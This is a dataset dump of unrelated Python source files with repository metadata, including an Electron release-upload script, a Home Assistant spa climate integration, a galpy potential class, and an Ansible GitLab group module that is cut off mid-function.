text
stringlengths 6
947k
| repo_name
stringlengths 5
100
| path
stringlengths 4
231
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 6
947k
| score
float64 0
0.34
|
---|---|---|---|---|---|---|
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^$', views.login, name='login'),
]
|
TrivialBox/HackatonUPS2016
|
helpfriends/login/urls.py
|
Python
|
mit
| 114 | 0.008772 |
#!/usr/bin/env python
import argparse
import errno
import hashlib
import os
import shutil
import subprocess
import sys
import tempfile
from io import StringIO
from lib.config import PLATFORM, get_target_arch, get_env_var, s3_config, \
get_zip_name
from lib.util import electron_gyp, execute, get_electron_version, \
parse_version, scoped_cwd, s3put
from lib.github import GitHub
ELECTRON_REPO = 'electron/electron'
ELECTRON_VERSION = get_electron_version()
PROJECT_NAME = electron_gyp()['project_name%']
PRODUCT_NAME = electron_gyp()['product_name%']
SOURCE_ROOT = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
OUT_DIR = os.path.join(SOURCE_ROOT, 'out', 'R')
DIST_DIR = os.path.join(SOURCE_ROOT, 'dist')
DIST_NAME = get_zip_name(PROJECT_NAME, ELECTRON_VERSION)
SYMBOLS_NAME = get_zip_name(PROJECT_NAME, ELECTRON_VERSION, 'symbols')
DSYM_NAME = get_zip_name(PROJECT_NAME, ELECTRON_VERSION, 'dsym')
PDB_NAME = get_zip_name(PROJECT_NAME, ELECTRON_VERSION, 'pdb')
def main():
args = parse_args()
if not args.publish_release:
if not dist_newer_than_head():
run_python_script('create-dist.py')
build_version = get_electron_build_version()
if not ELECTRON_VERSION.startswith(build_version):
error = 'Tag name ({0}) should match build version ({1})\n'.format(
ELECTRON_VERSION, build_version)
sys.stderr.write(error)
sys.stderr.flush()
return 1
github = GitHub(auth_token())
releases = github.repos(ELECTRON_REPO).releases.get()
tag_exists = False
for release in releases:
if not release['draft'] and release['tag_name'] == args.version:
tag_exists = True
break
release = create_or_get_release_draft(github, releases, args.version,
tag_exists)
if args.publish_release:
# Upload the Node SHASUMS*.txt.
run_python_script('upload-node-checksums.py', '-v', ELECTRON_VERSION)
# Upload the index.json.
run_python_script('upload-index-json.py')
# Create and upload the Electron SHASUMS*.txt
release_electron_checksums(github, release)
# Press the publish button.
publish_release(github, release['id'])
# Do not upload other files when passed "-p".
return
# Upload Electron with GitHub Releases API.
upload_electron(github, release, os.path.join(DIST_DIR, DIST_NAME))
upload_electron(github, release, os.path.join(DIST_DIR, SYMBOLS_NAME))
if PLATFORM == 'darwin':
upload_electron(github, release, os.path.join(DIST_DIR,
'electron-api.json'))
upload_electron(github, release, os.path.join(DIST_DIR, 'electron.d.ts'))
upload_electron(github, release, os.path.join(DIST_DIR, DSYM_NAME))
elif PLATFORM == 'win32':
upload_electron(github, release, os.path.join(DIST_DIR, PDB_NAME))
# Upload free version of ffmpeg.
ffmpeg = get_zip_name('ffmpeg', ELECTRON_VERSION)
upload_electron(github, release, os.path.join(DIST_DIR, ffmpeg))
# Upload chromedriver and mksnapshot for minor version update.
if parse_version(args.version)[2] == '0':
chromedriver = get_zip_name('chromedriver', ELECTRON_VERSION)
upload_electron(github, release, os.path.join(DIST_DIR, chromedriver))
mksnapshot = get_zip_name('mksnapshot', ELECTRON_VERSION)
upload_electron(github, release, os.path.join(DIST_DIR, mksnapshot))
if PLATFORM == 'win32' and not tag_exists:
# Upload PDBs to Windows symbol server.
run_python_script('upload-windows-pdb.py')
# Upload node headers.
run_python_script('create-node-headers.py', '-v', args.version)
run_python_script('upload-node-headers.py', '-v', args.version)
def parse_args():
parser = argparse.ArgumentParser(description='upload distribution file')
parser.add_argument('-v', '--version', help='Specify the version',
default=ELECTRON_VERSION)
parser.add_argument('-p', '--publish-release',
help='Publish the release',
action='store_true')
return parser.parse_args()
def run_python_script(script, *args):
script_path = os.path.join(SOURCE_ROOT, 'script', script)
return execute([sys.executable, script_path] + list(args))
def get_electron_build_version():
if get_target_arch() == 'arm' or os.environ.has_key('CI'):
# In CI we just build as told.
return ELECTRON_VERSION
if PLATFORM == 'darwin':
electron = os.path.join(SOURCE_ROOT, 'out', 'R',
'{0}.app'.format(PRODUCT_NAME), 'Contents',
'MacOS', PRODUCT_NAME)
elif PLATFORM == 'win32':
electron = os.path.join(SOURCE_ROOT, 'out', 'R',
'{0}.exe'.format(PROJECT_NAME))
else:
electron = os.path.join(SOURCE_ROOT, 'out', 'R', PROJECT_NAME)
return subprocess.check_output([electron, '--version']).strip()
def dist_newer_than_head():
with scoped_cwd(SOURCE_ROOT):
try:
head_time = subprocess.check_output(['git', 'log', '--pretty=format:%at',
'-n', '1']).strip()
dist_time = os.path.getmtime(os.path.join(DIST_DIR, DIST_NAME))
except OSError as e:
if e.errno != errno.ENOENT:
raise
return False
return dist_time > int(head_time)
def get_text_with_editor(name):
editor = os.environ.get('EDITOR', 'nano')
initial_message = '\n# Please enter the body of your release note for %s.' \
% name
t = tempfile.NamedTemporaryFile(suffix='.tmp', delete=False)
t.write(initial_message)
t.close()
subprocess.call([editor, t.name])
text = ''
for line in open(t.name, 'r'):
if len(line) == 0 or line[0] != '#':
text += line
os.unlink(t.name)
return text
def create_or_get_release_draft(github, releases, tag, tag_exists):
# Search for existing draft.
for release in releases:
if release['draft']:
return release
if tag_exists:
tag = 'do-not-publish-me'
return create_release_draft(github, tag)
def create_release_draft(github, tag):
name = '{0} {1}'.format(PROJECT_NAME, tag)
if os.environ.has_key('CI'):
body = '(placeholder)'
else:
body = get_text_with_editor(name)
if body == '':
sys.stderr.write('Quit due to empty release note.\n')
sys.exit(0)
data = dict(tag_name=tag, name=name, body=body, draft=True)
r = github.repos(ELECTRON_REPO).releases.post(data=data)
return r
def release_electron_checksums(github, release):
checksums = run_python_script('merge-electron-checksums.py',
'-v', ELECTRON_VERSION)
upload_io_to_github(github, release, 'SHASUMS256.txt',
StringIO(checksums.decode('utf-8')), 'text/plain')
def upload_electron(github, release, file_path):
# Delete the original file before uploading in CI.
filename = os.path.basename(file_path)
if os.environ.has_key('CI'):
try:
for asset in release['assets']:
if asset['name'] == filename:
github.repos(ELECTRON_REPO).releases.assets(asset['id']).delete()
except Exception:
pass
# Upload the file.
with open(file_path, 'rb') as f:
upload_io_to_github(github, release, filename, f, 'application/zip')
# Upload the checksum file.
upload_sha256_checksum(release['tag_name'], file_path)
# Upload ARM assets without the v7l suffix for backwards compatibility
# TODO Remove for 2.0
if 'armv7l' in filename:
arm_filename = filename.replace('armv7l', 'arm')
arm_file_path = os.path.join(os.path.dirname(file_path), arm_filename)
shutil.copy2(file_path, arm_file_path)
upload_electron(github, release, arm_file_path)
def upload_io_to_github(github, release, name, io, content_type):
params = {'name': name}
headers = {'Content-Type': content_type}
github.repos(ELECTRON_REPO).releases(release['id']).assets.post(
params=params, headers=headers, data=io, verify=False)
def upload_sha256_checksum(version, file_path):
bucket, access_key, secret_key = s3_config()
checksum_path = '{}.sha256sum'.format(file_path)
sha256 = hashlib.sha256()
with open(file_path, 'rb') as f:
sha256.update(f.read())
filename = os.path.basename(file_path)
with open(checksum_path, 'w') as checksum:
checksum.write('{} *{}'.format(sha256.hexdigest(), filename))
s3put(bucket, access_key, secret_key, os.path.dirname(checksum_path),
'atom-shell/tmp/{0}'.format(version), [checksum_path])
def publish_release(github, release_id):
data = dict(draft=False)
github.repos(ELECTRON_REPO).releases(release_id).patch(data=data)
def auth_token():
token = get_env_var('GITHUB_TOKEN')
message = ('Error: Please set the $ELECTRON_GITHUB_TOKEN '
'environment variable, which is your personal token')
assert token, message
return token
if __name__ == '__main__':
import sys
sys.exit(main())
|
rreimann/electron
|
script/upload.py
|
Python
|
mit
| 8,894 | 0.011806 |
"""Support for Balboa Spa Wifi adaptor."""
from __future__ import annotations
import asyncio
from homeassistant.components.climate import ClimateEntity
from homeassistant.components.climate.const import (
CURRENT_HVAC_HEAT,
CURRENT_HVAC_IDLE,
FAN_HIGH,
FAN_LOW,
FAN_MEDIUM,
FAN_OFF,
HVAC_MODE_AUTO,
HVAC_MODE_HEAT,
HVAC_MODE_OFF,
SUPPORT_FAN_MODE,
SUPPORT_PRESET_MODE,
SUPPORT_TARGET_TEMPERATURE,
)
from homeassistant.const import (
ATTR_TEMPERATURE,
PRECISION_HALVES,
PRECISION_WHOLE,
TEMP_CELSIUS,
TEMP_FAHRENHEIT,
)
from .const import CLIMATE, CLIMATE_SUPPORTED_FANSTATES, CLIMATE_SUPPORTED_MODES, DOMAIN
from .entity import BalboaEntity
SET_TEMPERATURE_WAIT = 1
async def async_setup_entry(hass, entry, async_add_entities):
"""Set up the spa climate device."""
async_add_entities(
[
BalboaSpaClimate(
entry,
hass.data[DOMAIN][entry.entry_id],
CLIMATE,
)
],
)
class BalboaSpaClimate(BalboaEntity, ClimateEntity):
"""Representation of a Balboa Spa Climate device."""
_attr_icon = "mdi:hot-tub"
_attr_fan_modes = CLIMATE_SUPPORTED_FANSTATES
_attr_hvac_modes = CLIMATE_SUPPORTED_MODES
def __init__(self, entry, client, devtype, num=None):
"""Initialize the climate entity."""
super().__init__(entry, client, devtype, num)
self._balboa_to_ha_blower_map = {
self._client.BLOWER_OFF: FAN_OFF,
self._client.BLOWER_LOW: FAN_LOW,
self._client.BLOWER_MEDIUM: FAN_MEDIUM,
self._client.BLOWER_HIGH: FAN_HIGH,
}
self._ha_to_balboa_blower_map = {
value: key for key, value in self._balboa_to_ha_blower_map.items()
}
self._balboa_to_ha_heatmode_map = {
self._client.HEATMODE_READY: HVAC_MODE_HEAT,
self._client.HEATMODE_RNR: HVAC_MODE_AUTO,
self._client.HEATMODE_REST: HVAC_MODE_OFF,
}
self._ha_heatmode_to_balboa_map = {
value: key for key, value in self._balboa_to_ha_heatmode_map.items()
}
scale = self._client.get_tempscale()
self._attr_preset_modes = self._client.get_heatmode_stringlist()
self._attr_supported_features = SUPPORT_TARGET_TEMPERATURE | SUPPORT_PRESET_MODE
if self._client.have_blower():
self._attr_supported_features |= SUPPORT_FAN_MODE
self._attr_min_temp = self._client.tmin[self._client.TEMPRANGE_LOW][scale]
self._attr_max_temp = self._client.tmax[self._client.TEMPRANGE_HIGH][scale]
self._attr_temperature_unit = TEMP_FAHRENHEIT
self._attr_precision = PRECISION_WHOLE
if self._client.get_tempscale() == self._client.TSCALE_C:
self._attr_temperature_unit = TEMP_CELSIUS
self._attr_precision = PRECISION_HALVES
@property
def hvac_mode(self) -> str:
"""Return the current HVAC mode."""
mode = self._client.get_heatmode()
return self._balboa_to_ha_heatmode_map[mode]
@property
def hvac_action(self) -> str:
"""Return the current operation mode."""
state = self._client.get_heatstate()
if state >= self._client.ON:
return CURRENT_HVAC_HEAT
return CURRENT_HVAC_IDLE
@property
def fan_mode(self) -> str:
"""Return the current fan mode."""
fanmode = self._client.get_blower()
return self._balboa_to_ha_blower_map.get(fanmode, FAN_OFF)
@property
def current_temperature(self):
"""Return the current temperature."""
return self._client.get_curtemp()
@property
def target_temperature(self):
"""Return the target temperature we try to reach."""
return self._client.get_settemp()
@property
def preset_mode(self):
"""Return current preset mode."""
return self._client.get_heatmode(True)
async def async_set_temperature(self, **kwargs):
"""Set a new target temperature."""
scale = self._client.get_tempscale()
newtemp = kwargs[ATTR_TEMPERATURE]
if newtemp > self._client.tmax[self._client.TEMPRANGE_LOW][scale]:
await self._client.change_temprange(self._client.TEMPRANGE_HIGH)
await asyncio.sleep(SET_TEMPERATURE_WAIT)
if newtemp < self._client.tmin[self._client.TEMPRANGE_HIGH][scale]:
await self._client.change_temprange(self._client.TEMPRANGE_LOW)
await asyncio.sleep(SET_TEMPERATURE_WAIT)
await self._client.send_temp_change(newtemp)
async def async_set_preset_mode(self, preset_mode) -> None:
"""Set new preset mode."""
modelist = self._client.get_heatmode_stringlist()
self._async_validate_mode_or_raise(preset_mode)
if preset_mode not in modelist:
raise ValueError(f"{preset_mode} is not a valid preset mode")
await self._client.change_heatmode(modelist.index(preset_mode))
async def async_set_fan_mode(self, fan_mode):
"""Set new fan mode."""
await self._client.change_blower(self._ha_to_balboa_blower_map[fan_mode])
def _async_validate_mode_or_raise(self, mode):
"""Check that the mode can be set."""
if mode == self._client.HEATMODE_RNR:
raise ValueError(f"{mode} can only be reported but not set")
async def async_set_hvac_mode(self, hvac_mode):
"""Set new target hvac mode.
OFF = Rest
AUTO = Ready in Rest (can't be set, only reported)
HEAT = Ready
"""
mode = self._ha_heatmode_to_balboa_map[hvac_mode]
self._async_validate_mode_or_raise(mode)
await self._client.change_heatmode(self._ha_heatmode_to_balboa_map[hvac_mode])
|
home-assistant/home-assistant
|
homeassistant/components/balboa/climate.py
|
Python
|
apache-2.0
| 5,803 | 0.001206 |
from __future__ import unicode_literals, division, absolute_import
from builtins import * # noqa pylint: disable=unused-import, redefined-builtin
from past.builtins import basestring
import logging
from datetime import datetime
from sqlalchemy import Column, DateTime
from flexget import db_schema, plugin
from flexget.event import event
from flexget.manager import Session
from flexget.utils.tools import get_latest_flexget_version_number, get_current_flexget_version
log = logging.getLogger('version_checker')
Base = db_schema.versioned_base('version_checker', 0)
class LastVersionCheck(Base):
__tablename__ = 'last_version_check'
last_check_time = Column(DateTime, primary_key=True)
def __init__(self):
self.update()
def update(self):
self.last_check_time = datetime.now()
schema = {
'oneOf': [
{'type': 'boolean'},
{'type': 'string', 'enum': ['always', 'by_interval']},
{
'type': 'object',
'properties': {
'lookup': {'type': 'string', 'enum': ['always', 'by_interval']},
'check_for_dev_version': {'type': 'boolean'},
'interval': {'type': 'integer'},
},
'additionalProperties': False,
},
]
}
class VersionChecker(object):
"""
A plugin that checks whether user is running the latest flexget version and place a log warning if not.
Checks via interval to avoid hammering, default is 1 day.
Can accept boolean or ['always', 'by_interval'] in config.
Can also accept object. If check_for_dev_version option is True, version will be checked even if current release
is dev, otherwise, it will be skipped.
"""
def prepare_config(self, config):
if isinstance(config, bool) and config is True:
config = {'lookup': 'by_interval'}
elif isinstance(config, basestring):
config = {'lookup': config}
config.setdefault('lookup', 'by_interval')
config.setdefault('interval', 1)
config.setdefault('check_for_dev_version', False)
return config
def on_task_start(self, task, config):
if not config:
return
config = self.prepare_config(config)
current_version = get_current_flexget_version()
if config.get('check_for_dev_version') is False and current_version.endswith('dev'):
log.debug('dev version detected, skipping check')
return
always_check = bool(config.get('lookup') == 'always')
interval = config.get('interval')
session = Session()
last_check = session.query(LastVersionCheck).first()
if not always_check:
if last_check:
time_dif = datetime.now() - last_check.last_check_time
should_poll = time_dif.days > interval
else:
should_poll = True
if not should_poll:
log.debug('version check interval not met, skipping check')
return
latest_version = get_latest_flexget_version_number()
if not latest_version:
log.warning('Could not get latest version of flexget')
return
elif latest_version != current_version:
log.warning(
'You are not running latest Flexget Version. Current is %s and latest is %s',
current_version,
latest_version,
)
if last_check:
log.debug('updating last check time')
last_check.update()
else:
last_check = LastVersionCheck()
log.debug('creating instance of last version check in DB')
session.add(last_check)
@event('plugin.register')
def register_plugin():
plugin.register(VersionChecker, 'version_checker', api_ver=2)
|
tobinjt/Flexget
|
flexget/plugins/operate/version_checker.py
|
Python
|
mit
| 3,855 | 0.001556 |
from test_oop import *
from beliefs.referent import *
import sys
TaxonomyCell.initialize(sys.modules[__name__])
m = MusicalThing()
print m
t = TaxonomyCell()
t.to_dot()
|
EventTeam/beliefs
|
test_oop/__init__.py
|
Python
|
gpl-2.0
| 171 | 0.005848 |
# Lesson 3
# If arguments n3 or later aren't provided by the caller, they'll use a default value instead
def add(n1, n2, n3=0, n4=0, n5=0, n6=0): # (We'll learn a better way to do something like this later)
return n1 + n2 + n3 + n4 + n5 + n6
print(add(1, 2, 3, 4))
# We can explicitly fulfil arguments out of order by using "named parameters"
print(add(n2=1, n1=4, n6=3))
|
JonTheBurger/python_class
|
chapter 3/lessons/default_arguments.py
|
Python
|
mit
| 383 | 0.007833 |
###############################################################################
# PowerSphericalPotentialwCutoff.py: spherical power-law potential w/ cutoff
#
# amp
# rho(r)= --------- e^{-(r/rc)^2}
# r^\alpha
###############################################################################
import numpy as nu
from scipy import special, integrate
from galpy.potential_src.Potential import Potential, kms_to_kpcGyrDecorator
class PowerSphericalPotentialwCutoff(Potential):
"""Class that implements spherical potentials that are derived from
power-law density models
.. math::
\\rho(r) = \\frac{\\mathrm{amp}}{r^\\alpha}\\,\\exp\\left(-(r/rc)^2\\right)
"""
def __init__(self,amp=1.,alpha=1.,rc=1.,normalize=False):
"""
NAME:
__init__
PURPOSE:
initialize a power-law-density potential
INPUT:
amp= amplitude to be applied to the potential (default: 1)
alpha= inner power
rc= cut-off radius
normalize= if True, normalize such that vc(1.,0.)=1., or, if given as a number, such that the force is this fraction of the force necessary to make vc(1.,0.)=1.
OUTPUT:
(none)
HISTORY:
2013-06-28 - Written - Bovy (IAS)
"""
Potential.__init__(self,amp=amp)
self.alpha= alpha
self.rc= rc
self._scale= self.rc
if normalize or \
(isinstance(normalize,(int,float)) \
and not isinstance(normalize,bool)): #pragma: no cover
self.normalize(normalize)
self.hasC= True
self.hasC_dxdv= True
self._nemo_accname= 'PowSphwCut'
def _evaluate(self,R,z,phi=0.,t=0.):
"""
NAME:
_evaluate
PURPOSE:
evaluate the potential at R,z
INPUT:
R - Galactocentric cylindrical radius
z - vertical height
phi - azimuth
t - time
OUTPUT:
Phi(R,z)
HISTORY:
2013-06-28 - Started - Bovy (IAS)
"""
r= nu.sqrt(R**2.+z**2.)
return 2.*nu.pi*self.rc**(3.-self.alpha)/r*(r/self.rc*special.gamma(1.-self.alpha/2.)*special.gammainc(1.-self.alpha/2.,(r/self.rc)**2.)-special.gamma(1.5-self.alpha/2.)*special.gammainc(1.5-self.alpha/2.,(r/self.rc)**2.))
def _Rforce(self,R,z,phi=0.,t=0.):
"""
NAME:
_Rforce
PURPOSE:
evaluate the radial force for this potential
INPUT:
R - Galactocentric cylindrical radius
z - vertical height
phi - azimuth
t - time
OUTPUT:
the radial force
HISTORY:
2013-06-26 - Written - Bovy (IAS)
"""
r= nu.sqrt(R*R+z*z)
return -self._mass(r)*R/r**3.
def _zforce(self,R,z,phi=0.,t=0.):
"""
NAME:
_zforce
PURPOSE:
evaluate the vertical force for this potential
INPUT:
R - Galactocentric cylindrical radius
z - vertical height
phi - azimuth
t - time
OUTPUT:
the vertical force
HISTORY:
2013-06-26 - Written - Bovy (IAS)
"""
r= nu.sqrt(R*R+z*z)
return -self._mass(r)*z/r**3.
def _R2deriv(self,R,z,phi=0.,t=0.):
"""
NAME:
_Rderiv
PURPOSE:
evaluate the second radial derivative for this potential
INPUT:
R - Galactocentric cylindrical radius
z - vertical height
phi - azimuth
t - time
OUTPUT:
the second radial derivative
HISTORY:
2013-06-28 - Written - Bovy (IAS)
"""
r= nu.sqrt(R*R+z*z)
return 4.*nu.pi*r**(-2.-self.alpha)*nu.exp(-(r/self.rc)**2.)*R**2.\
+self._mass(r)/r**5.*(z**2.-2.*R**2.)
def _z2deriv(self,R,z,phi=0.,t=0.):
"""
NAME:
_z2deriv
PURPOSE:
evaluate the second vertical derivative for this potential
INPUT:
R - Galactocentric cylindrical radius
z - vertical height
phi - azimuth
t- time
OUTPUT:
the second vertical derivative
HISTORY:
2013-06-28 - Written - Bovy (IAS)
"""
r= nu.sqrt(R*R+z*z)
return 4.*nu.pi*r**(-2.-self.alpha)*nu.exp(-(r/self.rc)**2.)*z**2.\
+self._mass(r)/r**5.*(R**2.-2.*z**2.)
def _Rzderiv(self,R,z,phi=0.,t=0.):
"""
NAME:
_Rzderiv
PURPOSE:
evaluate the mixed R,z derivative for this potential
INPUT:
R - Galactocentric cylindrical radius
z - vertical height
phi - azimuth
t- time
OUTPUT:
d2phi/dR/dz
HISTORY:
2013-08-28 - Written - Bovy (IAS)
"""
r= nu.sqrt(R*R+z*z)
return R*z*(4.*nu.pi*r**(-2.-self.alpha)*nu.exp(-(r/self.rc)**2.)
-3.*self._mass(r)/r**5.)
def _dens(self,R,z,phi=0.,t=0.):
"""
NAME:
_dens
PURPOSE:
evaluate the density force for this potential
INPUT:
R - Galactocentric cylindrical radius
z - vertical height
phi - azimuth
t - time
OUTPUT:
the density
HISTORY:
2013-06-28 - Written - Bovy (IAS)
"""
r= nu.sqrt(R**2.+z**2.)
return 1./r**self.alpha*nu.exp(-(r/self.rc)**2.)
def _mass(self,R,z=0.,t=0.):
"""
NAME:
_mass
PURPOSE:
evaluate the mass within R for this potential
INPUT:
R - Galactocentric cylindrical radius
z - vertical height
t - time
OUTPUT:
the mass enclosed
HISTORY:
2013-XX-XX - Written - Bovy (IAS)
"""
if z is None: r= R
else: r= nu.sqrt(R**2.+z**2.)
return 2.*nu.pi*self.rc**(3.-self.alpha)*special.gammainc(1.5-self.alpha/2.,(r/self.rc)**2.)*special.gamma(1.5-self.alpha/2.)
@kms_to_kpcGyrDecorator
def _nemo_accpars(self,vo,ro):
"""
NAME:
_nemo_accpars
PURPOSE:
return the accpars potential parameters for use of this potential with NEMO
INPUT:
vo - velocity unit in km/s
ro - length unit in kpc
OUTPUT:
accpars string
HISTORY:
2014-12-18 - Written - Bovy (IAS)
"""
ampl= self._amp*vo**2.*ro**(self.alpha-2.)
return "0,%s,%s,%s" % (ampl,self.alpha,self.rc*ro)
|
followthesheep/galpy
|
galpy/potential_src/PowerSphericalPotentialwCutoff.py
|
Python
|
bsd-3-clause
| 6,813 | 0.011449 |
import logging
import sys
from django.contrib.auth import get_user_model
from django.contrib.auth.models import Group, Permission
from django.contrib.contenttypes.models import ContentType
from cms.models import Page, PagePermission
from django_cms_tools.fixtures.pages import CmsPageCreator
# https://github.com/jedie/django-tools
from django_tools.permissions import get_filtered_permissions, pformat_permission
from django_tools.unittest_utils.user import get_or_create_user_and_group
from publisher import constants
from publisher.models import PublisherStateModel
from publisher_test_project.constants import EDITOR_GROUP, EDITOR_USER, REPORTER_GROUP, REPORTER_USER
from publisher_test_project.publisher_list_app.fixtures import list_item_fixtures
from publisher_test_project.publisher_list_app.models import PublisherItem
from publisher_test_project.publisher_test_app.models import (PublisherParlerAutoSlugifyTestModel,
PublisherParlerTestModel, PublisherTestModel)
log = logging.getLogger(__name__)
def get_permission(model, codename):
content_type = ContentType.objects.get_for_model(model)
permission = Permission.objects.get(content_type=content_type, codename=codename)
return permission
class TestPageCreator(CmsPageCreator):
placeholder_slots = ("content",)
dummy_text_count = 1
def __init__(self, no, *args, **kwargs):
self.no = no
super(TestPageCreator, self).__init__(*args, **kwargs)
def get_title(self, language_code, lang_name):
return "Test page %i in %s" % (self.no, lang_name)
def get_slug(self, language_code, lang_name):
slug = super(TestPageCreator, self).get_slug(language_code, lang_name)
log.debug("slug: %r (%r %s)", slug, language_code, lang_name)
return slug
def get_add_plugin_kwargs(self, page, no, placeholder, language_code, lang_name):
"""
Return "content" for create the plugin.
Called from self.add_plugins()
"""
return {
"plugin_type": "PlainTextPlugin", # publisher_test_app.cms_plugins.PlainTextPlugin
"text": "Dummy plain text plugin no.%i" % self.no
}
def create_test_user(delete_first=False):
User=get_user_model()
if delete_first:
qs = User.objects.exclude(is_superuser=True, is_active=True)
print("Delete %i users..." % qs.count())
qs.delete()
qs = Group.objects.all()
print("Delete %i user groups..." % qs.count())
qs.delete()
# all_permissions = [
# "%s.%s" % (entry.content_type, entry.codename)
# for entry in Permission.objects.all().order_by("content_type", "codename")
# ]
# pprint.pprint(all_permissions)
superuser_qs = User.objects.all().filter(is_superuser=True, is_active=True)
try:
superuser = superuser_qs[0]
except IndexError:
print("\nERROR: No active superuser found!")
print("Please create one and run again!\n")
sys.exit(-1)
print("Use password from Superuser:", superuser)
encrypted_password = superuser.password
# 'reporter' user can create (un-)publish requests:
reporter_user = get_or_create_user_and_group(
username=REPORTER_USER,
groupname=REPORTER_GROUP,
permissions=get_filtered_permissions(
exclude_app_labels=("auth", "sites"),
exclude_models=(
PagePermission,
),
exclude_codenames=(
"can_publish" # <app_name>.can_publish_<model_name>
"delete" # <app_name>.delete_<model_name>
),
exclude_permissions=(
# Django CMS permissions:
(Page, "publish_page"), # cms.publish_page
(Page, "delete_page"), # cms.delete_page
# Publisher permissions:
(PublisherStateModel, "add_publisherstatemodel"),
(PublisherStateModel, "delete_publisherstatemodel"),
(PublisherParlerAutoSlugifyTestModel, "can_publish_publisherparlerautoslugifytestmodel"),
(PublisherParlerAutoSlugifyTestModel, "delete_publisherparlerautoslugifytestmodel"),
(PublisherItem, "can_publish_publisheritem"),
(PublisherItem, "delete_publisheritem"),
(PublisherParlerTestModel, "can_publish_publisherparlertestmodel"),
(PublisherParlerTestModel, "delete_publisherparlertestmodel"),
(PublisherTestModel, "can_publish_publishertestmodel"),
(PublisherTestModel, "delete_publishertestmodel"),
),
),
encrypted_password=encrypted_password
)
# 'editor' can direct (un-)publish & accept/reject a (un-)publish request
editor_user = get_or_create_user_and_group(
username=EDITOR_USER,
groupname=EDITOR_GROUP,
permissions=get_filtered_permissions(
exclude_app_labels=("auth", "sites"),
exclude_models=(
PagePermission,
),
exclude_codenames=(),
exclude_permissions=(
# Publisher permissions:
(PublisherStateModel, "add_publisherstatemodel"),
(PublisherStateModel, "delete_publisherstatemodel"),
),
),
encrypted_password=encrypted_password
)
return reporter_user, editor_user
def create_test_page(delete_first=False):
for no in range(1,5):
page, created = TestPageCreator(no=no, delete_first=delete_first).create()
if created:
print("Test page created: '%s'" % page)
else:
print("Test page already exists: '%s'" % page)
def create_test_model_entries(delete_first=False):
if delete_first:
qs = PublisherTestModel.objects.all()
print("Delete %i test model entries..." % qs.count())
qs.delete()
for no in range(1,5):
instance, created = PublisherTestModel.objects.get_or_create(
no = no,
title="Test entry %i" % no,
publisher_is_draft=True
)
if created:
print("Test model entry: '%s'" % instance)
else:
print("Test model entry already exists: '%s'" % instance)
instance.publish()
def create_test_data(delete_first=False):
if delete_first:
qs = Page.objects.all()
log.debug("Delete %i CMS pages...", qs.count())
qs.delete()
reporter_user, editor_user = create_test_user(delete_first=delete_first)
create_test_page(delete_first=delete_first)
create_test_model_entries(delete_first=delete_first)
list_item_fixtures()
return reporter_user, editor_user
|
wearehoods/django-model-publisher-ai
|
publisher_test_project/fixtures.py
|
Python
|
bsd-3-clause
| 6,789 | 0.003535 |
#!/usr/bin/python
# Copyright: (c) 2015, Werner Dijkerman (ikben@werner-dijkerman.nl)
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: gitlab_group
short_description: Creates/updates/deletes Gitlab Groups
description:
- When the group does not exist in Gitlab, it will be created.
- When the group does exist and state=absent, the group will be deleted.
- As of Ansible version 2.7, this module make use of a different python module and thus some arguments are deprecated.
version_added: "2.1"
author: "Werner Dijkerman (@dj-wasabi)"
requirements:
- python-gitlab python module
options:
server_url:
description:
- Url of Gitlab server, with protocol (http or https).
required: true
validate_certs:
description:
- When using https if SSL certificate needs to be verified.
type: bool
default: 'yes'
aliases:
- verify_ssl
login_user:
description:
- Gitlab user name.
login_password:
description:
- Gitlab password for login_user
login_token:
description:
- Gitlab token for logging in.
name:
description:
- Name of the group you want to create.
required: true
path:
description:
- The path of the group you want to create, this will be server_url/group_path
- If not supplied, the group_name will be used.
description:
description:
- A description for the group.
version_added: "2.7"
state:
description:
- create or delete group.
- Possible values are present and absent.
default: "present"
choices: ["present", "absent"]
'''
EXAMPLES = '''
- name: "Delete Gitlab Group"
local_action:
gitlab_group:
server_url: http://gitlab.dj-wasabi.local
validate_certs: False
login_token: WnUzDsxjy8230-Dy_k
name: my_first_group
state: absent
- name: "Create Gitlab Group"
local_action:
gitlab_group:
server_url: https://gitlab.dj-wasabi.local"
validate_certs: True
login_user: dj-wasabi
login_password: "MySecretPassword"
name: my_first_group
path: my_first_group
state: present
'''
RETURN = '''# '''
try:
import gitlab
HAS_GITLAB_PACKAGE = True
except Exception:
HAS_GITLAB_PACKAGE = False
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_native
class GitLabGroup(object):
def __init__(self, module, git):
self._module = module
self._gitlab = git
self.groupObject = None
def createOrUpdateGroup(self, name, path, description):
changed = False
if self.groupObject is None:
group = self._gitlab.groups.create({'name': name, 'path': path})
changed = True
else:
group = self.groupObject
if description is not None:
if group.description != description:
group.description = description
changed = True
if changed:
if self._module.check_mode:
self._module.exit_json(changed=True, result="Group should have updated.")
try:
group.save()
except Exception as e:
self._module.fail_json(msg="Failed to create or update a group: %s " % e)
return True
else:
return False
def deleteGroup(self):
group = self.groupObject
if len(group.projects.list()) >= 1:
self._module.fail_json(
msg="There are still projects in this group. These needs to be moved or deleted before this group can be removed.")
else:
if self._module.check_mode:
self._module.exit_json(changed=True)
try:
group.delete()
except Exception as e:
self._module.fail_json(msg="Failed to delete a group: %s " % e)
return True
def existsGroup(self, name):
"""When group/user exists, object will be stored in self.groupObject."""
groups = self._gitlab.groups.list(search=name)
if len(groups) == 1:
self.groupObject = groups[0]
return True
def main():
module = AnsibleModule(
argument_spec=dict(
server_url=dict(required=True, type='str'),
validate_certs=dict(required=False, default=True, type='bool', aliases=['verify_ssl']),
login_user=dict(required=False, no_log=True, type='str'),
login_password=dict(required=False, no_log=True, type='str'),
login_token=dict(required=False, no_log=True, type='str'),
name=dict(required=True, type='str'),
path=dict(required=False, type='str'),
description=dict(required=False, type='str'),
state=dict(default="present", choices=["present", "absent"]),
),
mutually_exclusive=[
['login_user', 'login_token'],
['login_password', 'login_token']
],
required_together=[
['login_user', 'login_password']
],
required_one_of=[
['login_user', 'login_token']
],
supports_check_mode=True
)
if not HAS_GITLAB_PACKAGE:
module.fail_json(msg="Missing required gitlab module (check docs or install with: pip install python-gitlab")
server_url = module.params['server_url']
